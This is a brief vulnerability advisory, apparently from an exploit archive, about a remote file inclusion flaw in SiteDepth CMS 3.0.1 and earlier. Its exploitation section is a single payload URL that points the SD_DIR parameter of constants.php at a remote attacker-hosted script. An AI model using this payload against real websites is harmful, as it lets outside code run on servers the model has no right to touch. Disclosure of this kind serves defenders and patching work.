[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability
# Published : 2006-07-20
# Author : Aesthetico
# Previous Title : MyBulletinBoard (MyBB) <= 1.1.3 (usercp.php) Create Admin Exploit
# Next Title : Eskolar CMS 0.9.0.0 Remote Blind SQL Injection Exploit
Title: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability
------------------------------------------------------------------
Vendor: SiteDepth.com
URL: http://sitedepth.com
------------------------------------------------------------------
Credits:
Discovered by: "Aesthetico"
http://www.majorsecurity.de
------------------------------------------------------------------
Exploitation:
------------------------------------------------------------------
http://victim.com/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?
# www.Syue.com [2006-07-20]